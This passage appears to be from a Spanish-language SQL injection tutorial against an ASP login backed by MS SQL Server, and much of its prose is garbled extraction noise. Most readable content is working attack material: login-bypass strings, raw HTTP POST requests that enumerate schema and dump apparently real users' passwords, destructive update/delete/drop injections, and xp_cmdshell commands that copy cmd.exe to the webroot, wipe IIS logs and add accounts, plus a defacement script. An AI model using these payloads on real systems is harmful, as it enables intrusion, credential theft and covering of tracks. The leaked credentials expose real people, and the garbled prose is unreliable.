9 . ) < " ) " " 9 ( " * 9 = 6 ( 6 ) " " ) * " " ) #$% 4 " I :M& 6 " " * = " " + . " " " + " D . " 'or 1=1— Usuario : 'or 1=1-- ! "" L V W A 47 " "& 9 = " . ) + . select * from users where username = ' or 1=1-- and password = ' or 1=1--
  • 16. @ 1 9 " 9 " < " " " >: > 9 " & " " " 6 6 " 6 E " 6 " ) F & . + = " " " " " " " . " " 1 ( , 0 4 Usuario : 'OR''=' Password : 'OR''=' 5 4/ ' ) & " " 6 + 6 4 . " > " ">& " " " > 00 > E, ) / F " #$% ( & " " "& #$% 9 . 9 6 . . + # ) " " 7 " . " 6 " 9 . " < + " & " & " 6 " & " ) "& " . " " & ( " 6 . # . 4 & " " " " " " 9 < " " " )4 6 & .J " * >5 > > > " = + . " Usuario : Admin'-- Password : 'or 1=1-- 8 = & " 9 " " = " " " . select * from users where username = 'Admin'-- and password = ' or 1=1-- # " * "= + " . 4 & ) ) + " . 8 " & " 6 " ) 6 " " " > L > E' " F " " + > 00 > E, ) / F 6 9 " + " < "& " ) "
  • 17. " " > " . "> 6 " ) "& 9 " " " " . ) 4) # $ 7 ! . ! # 5 " " " " " * " < #$% + . & " 6 " ) 9 6 6 . " " ) " * " " " " . 9 " " ' + = " 9 " " & . + & = " * & ) 4 " > < " . > 9 " + * . " + " " " " " " ! " 9 . E' + < " F& " " " "& " " " " " . & . 9 9 " J " " ) " " "& + " 9 " 6 " " " & 4 & " 6 * " " " " " 6 " " " " ) 4 & " 6 " 4 & " + * " " " ) " < 6 . & . " 9 " " " . " " " 6 5 " * " " ) " * " " "& " 6 6 . " " ( " " " 9 D ) "9 " + * " " * " 1 7 ! $ 7 ! . % # " ' ; #$% # 6 & + " 6 " " 6 & " 6 . " " 6 ##$%#8 H8 & " > < > < Q " ) & " ) + > > " " " " ) " " #$% # 6 )Q ) " ) " ) " " * ) ) "& 6 " )4 "& + . ) " " * " 1 ) " " )4 " ) " " " . " 8 4 " " " " " . * .J 8 " " "& " " . * " " " " ) " + 6 " "
  • 18. B . 6 9# + & % " 9 " , . # 6 & . & " " " D " & " 6 " " " " " E' = " 5 F " " E8 " " * 9 " 9 " . ) " = " & 4 " " 6 " ( + ( & F 5 * " " " " " 9 " 6 " " & 9 6 " & " .J ) . 6 9 J * 9 " & . 4 & " " " " 9 = . " " 6 8 6 " " & M " " * " & 6 ) + #$%& = 4 & & 9 4 " " " Usuario : '; drop table usuarios-- Password : # * & " " 6 . " * EH " >8* " ! 6 . " >F & ) ) ) > " "> " & 9 " & .J " * " * " ' & + " " " & 6 " 6 ) ( " " & 6 5"= + & " 9 , # " " " " 9 " . 7 " " ) "& 9 ) " ( & ) = " + 1 $ % % + 67 & 4/ ) . $ : 3( ) & ! #& ! ) ) " * " " " " ( 7 " #$% 4 & " " " ) " 9 ) " " :,-' :%8 ,- 4 " #$% # 6 . ( D " # ) " " 9 & " . " & " " . 7< & " " " E " 9 ) " " ( = & . ) " 6 "& . " ) " 9 & + " " ) " " " * F
  • 19. C " 9 " " " 6 ) " + * 1 8 .1) 8 & " 9 6 ( " 6 " & 6 " " " 6 " ) " " " 9 " 6 ) " "& . " + * & " " * 9 " < " " 4 " " & + " " " 6 " " " " + " 6 ( " ! " " " . 4 & " " " ) " > L > E' # F " " D * " " . Warning: SQL error: [Microsoft][ODBC SQL Server Driver][SQL Server]Unclosed quotation mark before the character string '')'., SQL state 37000 in SQLExecDirect in php/db_odbc.inc on line 61 Database error: Invalid SQL: Select * from usuario where (usuario.login=''') ODBC Error: 1 (General Error (The ODBC interface cannot return detailed error messages).) Session halted. - & 6 " 9 * " < " :,-' :)6 " " " * #$% % < ) " " " . " E > )Q ) >F 2 ! " * )Q ) & " 9 " 3 8 ) ) " " ( " > " > ? " " " " > . > - & " 9 6 + " 6 " . * 9 + . " " :,-' 8 )Q ) 1 3 % ) 010.8#* - "3.9$ (")-#) :;<< 123
  • 20. ----- Fragmento ----------------------------------------- <?php /* * Session Management for PHP3 * * Copyright (c) 1998-2000 XXXXXXXXXXXXXXX (XXXXXX@XXXXX.XXX) * Modified by XXXXXXXXXXXXXXXXXXXX (XXXXXX@XXXXX.XXX) * * $Id: db_odbc.inc,v 1.3 2000/07/12 18:22:34 kk Exp $ */ class DB_Sql { var $Host = ""; var $Database = ""; var $User = ""; var $Password = ""; var $UseODBCCursor = 0; var $Link_ID = 0; var $Query_ID = 0; var $Record = array(); var $Row = 0; var $Errno = 0; var $Error = ""; ----- Fragmento ----------------------------------------- - " " " " >" " > 6 " " 6 " " 6 ) " X " + X! "" " " . & " 9 " ( " " " . " " 6 " " " " * & . " 6 4 * . 9 " * & " "& 9 * 9 9 6 " #$%& A " + 6 & " " . " 6 " " " . " " < 9 " 6 " * " " " ) E8 " " = ) " )Q ) F : ) & * / ! :M& 6 " " 9 + #$% + " * 6 " ) " " ) " "& * . + " " " ) 9 4 * " + . & " 9 4 " " ) " 6 + .
  • 21. 8 " " 6 " " " " ( & " ( 7 " #$% 4 & " " ! " 9 " 6 " " " * & . " 6 4 6 " " & " " 9 " " ) "& J " " ( 9 " " " ) " " ) < 9 6 7 " ;;! " 6 " # " + ) " " ' % E8 M " " B * " + % " ' "F& 9 " " " ) 4 E5 . 6 & " . F " . . = " - " 9 " 6 " " " " 6 " * " 7 " ;;! " )4 6 & " < " "& ( 9 D " 6 " < & " " " 6 < & " . * nc -vv www.objetivo.com 80 < sentencias.txt ' " ' + " * " " ;;! * & ( " ** * E8 " " * # +1 & " 8 9 F& . . " ) )4 6 . " ) " + " D " * " E5 . ) " " " F& " 6 " " 8" * " POST /Login.asp?validar=2 HTTP/1.1 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, */* Referer: http://www.xxxxxxxxxx.com/Login.asp?validar=2 Accept-Language: en-us Content-Type: application/x-www-form-urlencoded Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0) Host: www.xxxxxxxxxx.com Content-Length: 34 Connection: Keep-Alive Cache-Control: no-cache Cookie: ASPSESSIONIDQQGQQGBW=OBJADBEDBPHAHOMMOCBFNKDA; xxxxxxxxxx=COUNTRYNAME=Argentina txtUsuario=Angel&txtPassword=Angel Y Y Y H . " >! "" >
  • 22. Y * . " Y H . " > " > * . " - & " . 9 " " * !:#; ) " " ** 6 < 9 4 < & " " ) " " " . ! " 9 " " . + " ) 9 " " " " ) " + ) > L > E' " F * & 6 6 " & ) ( " ) " * ) ( 6 * ! " " 6 " " " " " " #$% 9 " " E 6 .& . )+& F 8 )4 6 " " ( > > " " ' " " " " > "> #$%& " * " 6 " * " 9 6 9 #$% E 4 6 < & " 4 :%8 ,-F ) " " " " )" 6 "& " 4 " * 6 " " 6 " " H 6 " " " 4 < 6 " " " * " ( " 7 !:#; 9 " ( " 6= ( " ) 4 6 POST /Login.asp?validar=2 HTTP/1.1 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg,application/x-shockwave-flash, */* Referer: http://www.xxxxxxxxxx.com/Login.asp?validar=2 Accept-Language: en-us Content-Type: application/x-www-form-urlencoded Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0) Host: www.xxxxxxxxxx.com Content-Length: 46 Connection: Keep-Alive Cache-Control: no-cache Cookie: ASPSESSIONIDQQGQQGBW=OBJADBEDBPHAHOMMOCBFNKDA; xxxxxxxxxx=COUNTRYNAME=Argentina txtUsuario=%27having+1%3D1--&txtPassword=Angel Y Y Y H 9 6 " Y >! "" > * Y . " Y H + L 6 . V 00 E8 Z 6 .[ Z2, 00F
  • 23. 2 1 . $ " = 3 )*1( 5*'> ! ) 6 " " " . " " " 6 !:#;& " 9 " " " ) " > "> " " " " ;;! % ) " " ( * " " 9 6 " 6 " ! + 4 ' # Z ] ! + ' Z2- , " ! " Z25 O O 8" [ Z V # . . Z2, & ' Z ' E ! 7 " " Z B F ! 7 " " Z C U + Z28 T Z2' 5 ) ! [ " Z - 0 " 0 ^ - M # " Z?' Q " Q :MK 9 " ( " 4 < & " " " " ( " 6= & + 6 9 " ! " 6 " 6 = 9 " 6= " " " 9 " 6 " 9 " & + 6 " 9 " " " " " ) 8 " nc -vv www.objetivo.com 80 < Injection.txt > result.html - 6 " 9 " 9 . " " + > 6 .>& ) " 6 " * " 9 4 " " ! " " " & . " & " 7 * " 9 " " * " ) " " " " + " H " 9 4 " "
  • 24. 3 Microsoft OLE DB Provider for ODBC Drivers error '80040e14'[Microsoft][ODBC SQL Server Driver][SQL Server]Column 'USUARIOS.UserID' is invalid in the select list because it is not contained in an aggregate function and there is no GROUP BY clause. /Login.asp, line 85 ! * KK " " " & " )" 6 9 " 4 " & 6 :,-' #$% # 6 " 6 6 ) ) ) " " ( * " " . . E # 5 :#F& "= ) 7 " E " ,F 5 9 " ) ) & " * " = & " 6 6 " " * 4 < + ( " " * " " "& " " " ) # 5 :# H " 9 = " * " 6 !:#; POST /Login.asp?validar=2 HTTP/1.1 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, */* Referer: http://www.xxxxxxxxxx.com/Login.asp?validar=2 Accept-Language: en-us Content-Type: application/x-www-form-urlencoded Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0) Host: www.xxxxxxxxxx.com Content-Length: 71 Connection: Keep-Alive Cache-Control: no-cache Cookie: ASPSESSIONIDQQGQQGBW=OBJADBEDBPHAHOMMOCBFNKDA;xxxxxxxxxxx =COUNTRYNAME=Argentina txtUsuario=%27group+by+usuarios.UserID+having+1%3D1-- &txtPassword=Angel Y Y H 9 6 " Y >! "" > * Y . " H + L. )+ " " " , 6 . V 00 % . 4 6 " = & 6 " " . " Microsoft OLE DB Provider for ODBC Drivers error '80040e14'[Microsoft][ODBC SQL Server Driver][SQL Server]Column 'USUARIOS.UID' is invalid in the select
  • 25. ? list because it is not contained in an aggregate function and there is no GROUP BY clause. /Login.asp, line 85 6 ( " " " & " 9 " " > 6 .> " 6 ( " >. )+> " ) + " , ) # 5 :#& " " , # . " .= & " " " " " + " " 9 ) # 5 :# ( " > . " > * " " "& " > 6 > " ) " + 8" " = * 'group by usuarios.UserID,usuarios.UID having 1=1-- #! ! * Microsoft OLE DB Provider for ODBC Drivers error '80040e14'[Microsoft][ODBC SQL Server Driver][SQL Server]Column USUARIOS.Nombre' is invalid in the select list because it is not contained in an aggregate function or the GROUP BY clause. /Login.asp, line 85 * 'group by usuarios.UserID,usuarios.UID,usuarios.Nombre having 1=1— #! ! * Microsoft OLE DB Provider for ODBC Drivers error '80040e14'[Microsoft][ODBC SQL Server Driver][SQL Server]Column USUARIOS.Email' is invalid in the select list because it is not contained in an aggregate function or the GROUP BY clause. /Login.asp, line 85
  • 26. @ * 'group by usuarios.UserID,usuarios.UID,usuarios.Nombre, usuarios.Email having 1=1-- #! ! * HTTP/1.1 100 Continue Server: Microsoft-IIS/4.0 Date: Fri, 14 Feb 2003 20:02:22 GMT HTTP/1.1 302 Object moved Server: Microsoft-IIS/4.0 Date: Fri,14 Feb 2003 20:02:23 GMT Connection: close Location: PaginaPersonal.asp Content-Length: 139 Content-Type: text/html Set-Cookie: xxxxxxxxxx=USEREMAIL=rcesar6%40hotmail%2Ecom&CHATNAME=&US ERFIRSTNAME=roxana&COUNTRYNAME=Argentina; expires=Sun, 16-Mar-2003 05:00:00 GMT;path=/ Cache-control: private Object Moved This object may be found here. :M 9 =& " )" 6 " + ) " . > " " 8 > 8 9 " " 9 & ) " . * ) " . " > > " ( " #8%8'; . E/ " 1 F A=4 " 9 " " !:#; ;;! 1: " & " 9 " " " 6 . " " " " ) " "& 4 6 9 #$% 6 + E8" " L. )+ " " " ,& " " ,& " " 1 ) & " " 8 6 . V 00F , " & " " 9 & * " * " " " " ) & ( " " " . " ' & . " " " " " . " 9 ;:,:# " " ) " " #8%8'; . & " "& 9 + 9 " " " " #8%8'; " + 9 * " " II 6 " 4 < " # 9 " * " " . SELECT campo1,campo2,campo3 FROM nom_tbl WHERE campo1=x AND campo5=y
  • 27. ( 7 E8" " >. )+> + > 6 .>F " ) = " " ) " > >& > > + > 2>& " ) = " < " > ?> E, * " " 9 " . * >#8%8'; _ A : ` a> " = " & " * ) " + " " " 7 F " " " " " " ) ( . " " POST /Login.asp?validar=2 HTTP/1.1 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, */* Referer: http://www.xxxxxxxxxx.com/Login.asp?validar=2 Accept-Language: en-us Content-Type: application/x-www-form-urlencoded Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0) Host: www.xxxxxxxxxx.com Content-Length: 297 Connection: Keep-Alive Cache-Control: no-cache Cookie: ASPSESSIONIDQQGQQGBW=OBJADBEDBPHAHOMMOCBFNKDA; xxxxxxxxxx=COUNTRYNAME=Argentina txtUsuario=Ups%27+union+select+b.name%2C1%2C1%2C1+from+sy sobjects+a%2C+syscolumns+b+where+a.id%3Db.id+and+a.name%3 D%27usuarios%27+and+b.name+in+%28select+top+01+b.name+fro m+sysobjects+a%2C+syscolumns+b+where+a.id%3Db.id+and+a.na me%3D%27usuarios%27+order+by+1+desc%29+order+by+1-- &txtPassword=Angel Y Y Y H 9 6 " Y >! "" > * . " Y Y H + "L " ) & & & * "+" )4 " & "+" " ) V) VL " "L ) E" ) * "+" )4 " & "+" " ) V) VL " "L )+ " F )+ 00 - 9 " " " III H "& ( " + > "> = ) " 9 " " # * " ( " " . & " " + % . " 1 :1 " . + 9 " " " & " " " " ) " " " #S#:-b8';# + #S#':% 1# " > ,> * 9 " ) " 6 ( " ;:! E8 " " F % " " " ( 1 6 9 " " 6 " #8%8'; 7 " "& "= * 9 ) 6 " "
  • 28. B 4 ;:!& " 9 . " " ;:,:# " " ) )4 6 " !:#; 6 ;:! F % " 9 = " ) " " " . " " " & Ups' union select b.name,1,1,1 from sysobjects a, syscolumns b where a.id=b.id and a.name='usuarios' and b.colorder = 48 -- 7 " & 4 " 4 " + J . " " " E! 4 9 " " " " " ) ( " > >F ! 6 " " " 7 " 4 Microsoft OLE DB Provider for ODBC Drivers error '80040e07' [Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value 'UserSubPLUSDate' to a column of data type int. /Login.asp, line 85 :M& 6 " :,-' " " 9 ) ) # 5 :# " > " # )!% #, > % . " & 6 " . ;:! + " . " " " " ) " + " :- .# ! #& + 5 ) & & + " 6 ( 9 " " " . 6 " & ) " " ) " ) + " "& " 9 ) 7 " " 6 . " 9 " " % . " & " " " #$% > 1 :1>& D * ># EF> " # ) " 1 :1 " " " " >) " "> 9 " * . 4 #$%& " 9 " J " * "& " ) " J 6 " ) " " ! 4 & " " J 1 :1& " " " > >& ) " " " " " ) " " ! " * # EF& " ) " 7 " . " "
  • 29. C 5 9 " " . ) " " 6 " " ( " 4 "& & " + ; " " 6 " 4 < + 7 " * 9 . " . " POST /Login.asp?validar=2 HTTP/1.1 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, */* Referer: http://www.xxxxxxxxxx.com/Login.asp?validar=2 Accept-Language: en-us Content-Type: application/x-www-form-urlencoded Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0) Host: www.xxxxxxxxxx.com Content-Length: 82 Connection: Keep-Alive Cache-Control: no-cache Cookie: ASPSESSIONIDQQGQQGBW=OBJADBEDBPHAHOMMOCBFNKDA; xxxxxxxxxx=COUNTRYNAME=Argentina txtUsuario=%27+union+select+sum(UID)%2C1%2C1%2C1+from+usu arios--&txtPassword=Angel Y Y Y H 9 6 " >! "" > Y * . " Y H + L " " E ,F& & & * " "00 6 ( "& . 4 " " = 1 6 !:#; " " 6 )4 6 & ) " " " . < Microsoft OLE DB Provider for ODBC Drivers error '80040e07'[Microsoft][ODBC SQL Server Driver][SQL Server]The sum or average aggregate operation cannot take a nvarchar data type as an argument. /Login.asp, line 85 - " " 6 9 6 :,-' " " ) " " & 4 6 " " E> ,> " 4 F " " ) 9 " I 8 " 9 " " " " 1:& 6 ( " " & " 6 " " 9 = " , ) 9 " " " " " ) ) ( & "= & + )
  • 30. 2 " " 6 "& " ) * " ( " " #$% ) " " ) " E! " " " )4 6 #$%KK& IIF 8 "& " " " " " " & " " " " " " #$% 1 :1& 9 4 " # + " " " & " ) ) " ( & ; !: ,8 ,5;: 9 " " " 9 " . " " ! " " . & 9 " 9 " " " + I :M& < ' " 5 + " < =" >5 6 #$% 4 ` a>& #$% ># > 6 * & 6 " " & #$% " < * " " 4 " 9 " " " " " " " " " " 4 " * 9 " 4 " + > ,> 8" " 4 " 4 6 9 " " 1H5 ' 5 EA " " " " F " 6 #$% " " >9 4 > 7 " 9 . # 1H5 ' 5 - & . " " 6 " 6 7 " . " " " + " " "& " . ) ) " " #$% ! . * & )" 6 " 9 " 6 1 &( ! (! # 5 :# 4 # # " " " # )!% #, " " " . " , " " " ! ) ! * " " " ! * M " " " ! * " " " " ! <# " " " " ! <1 " " " ! M " " " % " # " " " " , " " " , M " " , E1 ) " F " " # " " !G# E' " D F 8 ' 6 & " * * " ( " ) "& " " + " " "& . " " " 6 " < " ! & " > . " D > > . > " E! .J F 9 " & " " "& " " ) " 9 " . " " " ) " ) " " " " ) "& + " " " 6 " " > >& 9 ;:,5 * * 6 " )4 6 & b 1;5 >86 "& , " ) + 8 > . " " " " 4 . " , & " & E% " 9 ) 9 F . . 9 " + " "
  • 31. 2 4; ! * #! ! !< !& ! (! 6 ( #$%& ( " " " . " * ) " " )4 6 & ( . " " 7 " 9 " ) " = (! , 8 .= # . "& >) " > ) " " " . & " " 9 6 ) " " " A=4 " 9 * . " ) * * 4 . " " "" ) " " 6 & ( 7 " " " " > $6 3 / (! 6#; ! % " " " & " ( * #$% . ) " 6 " 1;: 9 " . " . " E% 9 " * 6 " 6 " ( F * * " 6 " " " , + !G# H 6 " " " F + 6 " * 9 ) = 6 !:#; + POST /Login.asp?validar=2 HTTP/1.1 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg,application/x-shockwave-flash, */* Referer: http://www.xxxxxxxxxx.com/Login.asp?validar=2 Accept-Language: en-us Content-Type: application/x-www-form-urlencoded Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0) Host: www.xxxxxxxxxx.com Content-Length: 199 Connection: Keep-Alive Cache-Control: no-cache Cookie: ASPSESSIONIDQQGQQGBW=OBJADBEDBPHAHOMMOCBFNKDA; xxxxxxxxxx=COUNTRYNAME=Argentina txtUsuario=%27+declare+@aux+varchar%288000%29+set+@aux%3D %27%27+select+@aux%3D@aux+%2B+UID%2B%27/%27%2BPWS%2B%27%3 B%27+from+usuarios+where+UID%3E@aux+select+@aux+as+aux+in to+xtmp--&txtPassword=Angel Y Y Y H 9 6 " Y >! "" > * Y . " Y
  • 32. 2 H + L < 6 EB F " <VLL " <V <[ [L L[ "[L]L* " " U < " < " < < W -> $6 3 , 8 . ! (! 6#; ! 6 ( " " & " ) " + #8%8'; ) ( 7 " " POST /Login.asp?validar=2 HTTP/1.1 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg,application/x-shockwave-flash, */* Referer: http://www.xxxxxxxxxx.com/Login.asp?validar=2 Accept-Language: en-us Content-Type: application/x-www-form-urlencoded Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0) Host: www.xxxxxxxxxx.com Content-Length: 76 Connection: Keep-Alive Cache-Control: no-cache Cookie: ASPSESSIONIDQQGQQGBW=OBJADBEDBPHAHOMMOCBFNKDA; xxxxxxxxxx=COUNTRYNAME=Argentina txtUsuario=Ups%27union+select+aux%2C1%2C1%2C1+from+xtmp-- &txtPassword=Angel Y Y H 9 6 " Y >! "" > * Y . " Y H + "L " <& & & * < 00 ) ( " !:#; * & 6 :,-' 6 6 " " ) " 4 " * . ) " . * * " " " Login de Usuarios Registrados Microsoft OLE DB Provider for ODBC Drivers error '80040e07'[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the varchar value 'Danyr2/pepe;THEMA/M1703;CIELORIANO/daniel;ALELARRAINP/14 05;SANDRA/4484188;0001/13119695;AsdrubalCh/1173;beatrizay ala/10338154;maria_perez/12345;batv/peresosita;susy/susyk a;Mireya_Salazar/gabriela;MVidales/male;AngelicaS/chainy;
  • 33. 22 carla/cardie;MonicaA/amorcito;aliciafalcon/baby;dayana/ne ne;Luz_d/carmen;mguevara/martha;Tiatere1/lima27;CMorena/2 11095;victor... /Login.asp, line 85 2> $6 3 4! & ! (! 6#; ! 6 ( ) " " " ) " "& ) ( " & " . + , :!& " " " . 4 POST /Login.asp?validar=2 HTTP/1.1 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg,application/x-shockwave-flash, */* Referer: http://www.xxxxxxxxxx.com/Login.asp?validar=2 Accept-Language: en-us Content-Type: application/x-www-form-urlencoded Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0) Host: www.xxxxxxxxxx.com Content-Length: 53 Connection: Keep-Alive Cache-Control: no-cache Cookie: ASPSESSIONIDQQGQQGBW=OBJADBEDBPHAHOMMOCBFNKDA; xxxxxxxxxx=COUNTRYNAME=Argentina txtUsuario=%27%3Bdrop+table+xtmp--&txtPassword=Angel Y Y Y H 9 6 " Y >! "" > * . " Y H + L] ) < 00 - 6! ! ; " " " " " " " " . & " " " " 6 " " " . 6 ) " " " " "& "& 9 ( 6 " 9 . * & " " 5 " " " " " ) " " 9 " * & . . . " " " ) " " $+6 4 H " 4 9 " " " !:#; ( "" " . " " 6= + " !,5;8
  • 34. 23 POST /Login.asp?validar=2 HTTP/1.1 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg,application/x-shockwave-flash, */* Referer: http://www.xxxxxxxxxx.com/Login.asp?validar=2 Accept-Language: en-us Content-Type: application/x-www-form-urlencoded Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0) Host: www.xxxxxxxxxx.com Content-Length: 103 Connection: Keep-Alive Cache-Control: no-cache Cookie: ASPSESSIONIDQQGQQGBW=OBJADBEDBPHAHOMMOCBFNKDA; xxxxxxxxxx=COUNTRYNAME=Argentina txtUsuario=%27%3Bupdate+usuarios+set+pws%3D%27NuevoPass%2 7+where+uid%3D%27Carla%27--&txtPassword=Angel Y Y Y H 9 6 " Y >! "" > * Y . " Y H + L " " " "VL1 6 ! ""L VL' L00 +4 4 4 # & . " * " !:#; & . " + 9 E5 9 " * 9 " " #$% # 6 F . " H + 'delete from usuarios where UID='Usuario'-- 1 4 $ " 1#8 ;& ) " 9 " " 4 & " " 9 & " " " "& " " 6 " 6 " " " " 9 + . " " " ! & " " ) ( . & + 4 " & . " E' " 4 KKKF " = " ) " . 9 = 9 " " ( " 7 & 6 " " " "& + . ( 9 " " " )
  • 35. 2? 5"= " & " 9 < " " " " 1#8 ; " " 9 " ) " & 4 * " + & " . = 9 " " " " ( " !:#; 6= :)6 7< " + . * 9 " + . & " ) " " " " + " " " 6 " " POST /Login.asp?validar=2 HTTP/1.1 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, */* Referer: http://www.xxxxxxxxxx.com/Login.asp?validar=2 Accept-Language: en-us Content-Type: application/x-www-form-urlencoded Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0) Host: www.xxxxxxxxxx.com Content-Length: 113 Connection: Keep-Alive Cache-Control: no-cache Cookie: ASPSESSIONIDQQGQQGBW=OBJADBEDBPHAHOMMOCBFNKDA; xxxxxxxxxx=COUNTRYNAME=Argentina txtUsuario=%27%3Binsert+into+usuarios+values+%28%27MyUser %27%2C%27MyPassword%27%29--&txtPassword=Angel Y Y Y H 9 6 " Y >! "" > * Y . " Y H + L] " " " 6 " EL + " L&L +! "" LF00 % & & ! ! " . " . " ! " ) ( . " 7 " " " #$% 4 " " ( " " " " * " * & ) " 6 " II * 6 1: " " . & " " * " 9 " * #$% # 6 " >8< # ! "> " < " $ # ?4; $ # % " " < " " " & ,%%L" 9 < " " ) " " " " & " " " " 8< " " " " < "& 6 " #0#$%& " " ) * " 5 . " "& #0#$% ) " ) .
  • 36. 2@ " " " < " "& " " & * " ) ) " " " 9 " 5 ) " * " "& " " " " " " " " " " " 9 " + " ( " " " < Q " N Q " " 4 " " " 6 6= #$% > " > " K 6 " ( = " " " " . " 4 " " ;;! POST /Login.asp?validar=2 HTTP/1.1 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg,application/x-shockwave-flash, */* Referer: http://www.xxxxxxxxxx.com/Login.asp?validar=2 Accept-Language: en-us Content-Type: application/x-www-form-urlencoded Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0) Host: www.xxxxxxxxxx.com Content-Length: 90 Connection: Keep-Alive Cache-Control: no-cache Cookie: ASPSESSIONIDQQGQQGBW=OBJADBEDBPHAHOMMOCBFNKDA; xxxxxxxxxx=COUNTRYNAME=Argentina txtUsuario=Ups%27%3BEXEC+master.dbo.xp_cmdshell%27cmd.exe +dir+c%3A%27--&txtPassword=Angel Y Y Y H 9 6 " Y >! "" > * Y . " Y H + "L]8N8' " ) < Q " L < L00 :M ) " " " + * ) 9 " 4 & " ) 4 " #5 E 6 " " " ) " ( < Q " F , " * " " )" 6 " " " = " ) " * " 6 > > . 9 " ) " * . " 6 " E8 " " & & & " & F 5 4 & 6 " . " " * " 9 " " = 6 " " < Q " E/ " 1 ) 4 " ) " " = "F
  • 37. 2 ! " EXEC master..xp_cmdshell 'dir c:inetpubwwwroot' ! 6 9 6 EXEC master..xp_cmdshell 'type c:inetpubwwwrootalguna_pagina.asp' ! " ) EXEC master..xp_cmdshell 'copy c:winntsystem32cmd.exe c:inetpubwwwrootchroot.exe' ! ) " EXEC master..xp_cmdshell 'DIR c:winntsystem32logfilesw3svc1' EXEC master..xp_cmdshell 'NET STOP "Servicio de publicación en World Wide Web"' EXEC master..xp_cmdshell 'del c:winntsystem32logfilesw3svc1 filelog.log' EXEC master..xp_cmdshell 'NET START "Servicio de publicación en World Wide Web"' ! 6 " EXEC master..xp_cmdshell 'NET SHARE nombre=drive:path' ! " 6 G " EXEC master..xp_cmdshell 'NET USER username password' :M& " ) . " " >8< # ! ">& " . " " " " >1 8< ">& " " ) 7 ) " & 4 " " " " " # " + " 'exec master..sp_addlogin MyUser, MyPass 9 " . " " ) 6 & " " ; " * & . . " " ) " 9 " ) & " " " " " ># ! "> + >8< # ! "> 9 ) = " " ) " " " " ! " " " " " & " * " + = #0#$% # 6 " * " " " " + " " " 6 " * "
  • 38. 2B " Q " Q " Q " + " Q * . " Q " 6 ) " Q . < Q ) "M < Q . < Q . < Q . M + < Q . 6 < Q" 6 < Q " < Q < Q 6 . - $ % + ) % " & * " & " " " + " " ) " " " + 7 " . " " #$% 4 & * + " ' " ) 4 ) " " & 4 " " 9 * ( " " " ( 4 " > * > % " 7 "& 9 " ( 67" #$% E$ + +( 9 9 " < ) " " #$% 6= :,-'F& " 9 " " #5& " ) " " 322& ) " . * 9 " # ) & " . " + " #$%& . " . - " " & 9 4 * " 1 & " . " > . (( # + ; >& " M <& < " " 7 " 6 " H " . " * . " ----- Extracto ------------------------------------------ [...] La idea es crear una pagina html o asp, si en el sitio objetivo se encuentra activo y funciónando un webserver [...] declare @o int, @f int, @t int, @ret int exec sp_oacreate 'scripting.filesystemobject', @o out exec sp_oamethod @o, 'createtextfile', @f out, 'c:web-hostingattajdidindex3.html', 1 exec @ret=sp_oamethod @f, 'writeline', NULL, '<HTML> <HEAD><TITLE>Hola Mundo!!!</TITLE> </HEAD> <BODY text=black bgColor=#000000> <CENTER> <P><B>' exec @ret=sp_oamethod @f, 'writeline', NULL, '<FONT face=Arial color=#b4b58c size=7>Vosotros </B>Perejil...</B></FONT></P></CENTER> <P><BR><BR>' exec @ret=sp_oamethod @f, 'writeline', NULL, '<!--" "-- ></P> <P></P> <CENTER> <P><B><FONT face=Arial color=#b4b58c size=7>' exec @ret=sp_oamethod @f, 'writeline', NULL, 'nosotros vuestras </B>WEB<B>s!!!</B></FONT></P></CENTER> <P><BR><BR></P>'
  • 39. 2C exec @ret=sp_oamethod @f, 'writeline', NULL, '<DIV align=center> <CENTER> <TABLE cellSpacing=0 cellPadding=0 width=100 border=0>' exec @ret=sp_oamethod @f, 'writeline', NULL, '<TBODY> <TR> <TD bgColor=#d20000>&nbsp;</TD></TR> <TR> <TD align=middle bgColor=#ffff00>' exec @ret=sp_oamethod @f, 'writeline', NULL, '<FONT color=#ffff00 size=1>¡ORTO!<BR>¡¡¡Va por vosotros!!! </FONT></TD></TR> <TR> <TD ' exec @ret=sp_oamethod @f, 'writeline', NULL, 'bgColor=#d20000>&nbsp ;</TD></TR><!--" "-- ></TBODY></TABLE></CENTER></DIV> ' exec @ret=sp_oamethod @f, 'writeline', NULL, '<P><BR><BR><BR><BR><BR></P>' exec @ret=sp_oamethod @f, 'writeline', NULL, '<P align=right> <FONT face="Courier New" color=#00ff00 size=5> lagear & runlevel</FONT></P>' exec @ret=sp_oamethod @f, 'writeline', NULL, '<P align=right> <FONT face="Courier New" color=#00ff00 size=4>Recuerdos a <B>N</B>9<B>Team</B></FONT>' exec @ret=sp_oamethod @f, 'writeline', NULL, '</P> <P align=right> <FONT face="Courier New" color=#00ff00 size=3>' exec @ret=sp_oamethod 